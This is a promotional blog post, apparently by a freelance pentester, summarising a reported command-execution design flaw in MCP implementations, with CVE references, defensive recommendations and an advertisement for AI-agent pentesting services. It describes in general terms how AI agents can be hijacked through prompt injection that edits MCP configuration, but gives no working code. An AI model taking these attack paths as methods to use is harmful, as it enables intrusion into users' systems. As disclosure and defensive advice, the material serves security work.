MCP Vulnerability: Remote Command Execution in Anthropic’s AI Protocol
A design flaw in Anthropic’s Model Context Protocol (MCP) allows attackers to run arbitrary commands on systems running vulnerable MCP implementations.
150 million+ downloads affected. 7,000+ public servers and packages. 10+ CVEs across the ecosystem.
If you’re using MCP-based tools โ LangChain, Flowise, Cursor, Windsurf, or any of the 7,000+ affected services โ attackers could potentially access your data, API keys, databases, and chat histories. Remotely.
What Is the Vulnerability?
Researchers at OX Security discovered that unsafe defaults in how MCP handles STDIO (standard input/output) configuration enable Arbitrary Command Execution (RCE).
In plain English: an attacker who can send a command to an MCP server can execute code on the machine running it. The issue exists across all language implementations โ Python, TypeScript, Java, and Rust.
The vulnerability falls into four categories:
- Unauthenticated command injection via MCP STDIO
- Direct STDIO configuration with hardening bypass
- Zero-click prompt injection editing MCP configuration
- Hidden STDIO configurations triggered via network requests
Affected Projects (Partial List)
Plus: MCP Inspector (CVE-2025-49596), LibreChat (CVE-2026-22252), WeKnora (CVE-2026-22688), and Cursor (CVE-2025-54136).
Anthropic’s Response
Anthropic has declined to modify the protocol’s architecture, citing the behavior as “expected.”
Let me translate that for you: “We designed it this way. It’s working as intended. The risk is now your problem.”
OX Security put it perfectly: “Shifting responsibility to implementers does not transfer the risk. It just obscures who created it.”
What This Means for Your AI Agent
If your AI agent uses MCP โ directly or through a framework like LangChain or Flowise โ here’s what’s at risk:
- ๐ด Remote code execution on your server
- ๐ด Exposed API keys and credentials
- ๐ด Database access and data exfiltration
- ๐ด Chat history leakage
- ๐ด Lateral movement to internal systems
What You Should Do Right Now
- Block public IP access to any MCP services
- Run MCP-enabled services in a sandbox/container โ no exceptions
- Monitor MCP tool invocations for anomalies
- Treat external MCP configuration input as untrusted
- Only install MCP servers from verified sources
- Patch affected tools immediately (LiteLLM, Bisheng, DocsGPT have patches available)
This is what a supply chain vulnerability looks like in the AI era.
Can a Pentest Find This?
Yes. This is exactly the kind of vulnerability I look for.
MCP command injection, STDIO configuration bypasses, prompt injection leading to RCE โ these are testable attack surfaces. Automated scanners miss them. Human-led red teaming finds them.
If you’re running MCP anywhere in your stack, assume nothing. Test everything.
๐ฆ๐
Worried about your AI agent’s security?
AI agent pentesting. Prompt injection. MCP vulnerabilities. RCE. Supply chain attacks.
I find what automated scanners miss.
๐ฉ DM @StackOfTruths on X
Free 15-min consultation. No hard sell. Just honest answers about your AI agent security.












Leave a Reply